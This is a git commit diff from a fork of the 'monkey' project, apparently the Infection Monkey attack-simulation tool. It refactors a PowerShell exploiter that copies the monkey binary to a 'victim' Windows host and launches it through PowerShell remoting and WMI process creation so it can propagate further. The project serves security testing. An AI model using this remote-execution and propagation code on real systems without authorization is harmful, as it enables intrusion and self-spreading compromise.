forked from p15670423/monkey
Agent: Extract method _build_monkey_execution_command
This commit is contained in:
Mike Salvatore
parent
1928f1b9bc
commit
aef8f2e37a
|
|
@ -121,15 +121,15 @@ class PowerShellExploiter(HostExploiter):
|
||||||
|
|
||||||
self._write_virtual_file_to_local_path()
|
self._write_virtual_file_to_local_path()
|
||||||
|
|
||||||
self.monkey_path_on_victim = (
|
monkey_path_on_victim = (
|
||||||
self._config.dropper_target_path_win_32
|
self._config.dropper_target_path_win_32
|
||||||
if self.is_32bit
|
if self.is_32bit
|
||||||
else self._config.dropper_target_path_win_64
|
else self._config.dropper_target_path_win_64
|
||||||
)
|
)
|
||||||
is_monkey_copy_successful = self._copy_monkey_binary_to_victim()
|
is_monkey_copy_successful = self._copy_monkey_binary_to_victim(monkey_path_on_victim)
|
||||||
|
|
||||||
if is_monkey_copy_successful:
|
if is_monkey_copy_successful:
|
||||||
self._run_monkey_executable_on_victim()
|
self._run_monkey_executable_on_victim(monkey_path_on_victim)
|
||||||
else:
|
else:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
@ -153,28 +153,17 @@ class PowerShellExploiter(HostExploiter):
|
||||||
with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as monkey_local_file:
|
with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as monkey_local_file:
|
||||||
monkey_local_file.write(monkey_virtual_file.read())
|
monkey_local_file.write(monkey_virtual_file.read())
|
||||||
|
|
||||||
def _copy_monkey_binary_to_victim(self) -> bool:
|
def _copy_monkey_binary_to_victim(self, dest: str) -> bool:
|
||||||
try:
|
try:
|
||||||
self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, self.monkey_path_on_victim)
|
self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, dest)
|
||||||
return True
|
return True
|
||||||
except Exception:
|
except Exception:
|
||||||
return False
|
return False
|
||||||
finally:
|
finally:
|
||||||
os.remove(TEMP_MONKEY_BINARY_FILEPATH)
|
os.remove(TEMP_MONKEY_BINARY_FILEPATH)
|
||||||
|
|
||||||
def _run_monkey_executable_on_victim(self) -> None:
|
def _run_monkey_executable_on_victim(self, executable_path) -> None:
|
||||||
monkey_params = build_monkey_commandline(
|
monkey_execution_command = self._build_monkey_execution_command(executable_path)
|
||||||
target_host=self.host,
|
|
||||||
depth=get_monkey_depth() - 1,
|
|
||||||
vulnerable_port=None,
|
|
||||||
location=self.monkey_path_on_victim,
|
|
||||||
)
|
|
||||||
|
|
||||||
monkey_execution_command = RUN_MONKEY % {
|
|
||||||
"monkey_path": self.monkey_path_on_victim,
|
|
||||||
"monkey_type": DROPPER_ARG,
|
|
||||||
"parameters": monkey_params,
|
|
||||||
}
|
|
||||||
|
|
||||||
with self.client.wsman, RunspacePool(self.client.wsman) as pool:
|
with self.client.wsman, RunspacePool(self.client.wsman) as pool:
|
||||||
ps = PowerShell(pool)
|
ps = PowerShell(pool)
|
||||||
|
|
@ -182,3 +171,17 @@ class PowerShellExploiter(HostExploiter):
|
||||||
"name", "create"
|
"name", "create"
|
||||||
).add_parameter("ArgumentList", monkey_execution_command)
|
).add_parameter("ArgumentList", monkey_execution_command)
|
||||||
ps.invoke()
|
ps.invoke()
|
||||||
|
|
||||||
|
def _build_monkey_execution_command(self, executable_path) -> str:
|
||||||
|
monkey_params = build_monkey_commandline(
|
||||||
|
target_host=self.host,
|
||||||
|
depth=get_monkey_depth() - 1,
|
||||||
|
vulnerable_port=None,
|
||||||
|
location=executable_path,
|
||||||
|
)
|
||||||
|
|
||||||
|
return RUN_MONKEY % {
|
||||||
|
"monkey_path": executable_path,
|
||||||
|
"monkey_type": DROPPER_ARG,
|
||||||
|
"parameters": monkey_params,
|
||||||
|
}
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue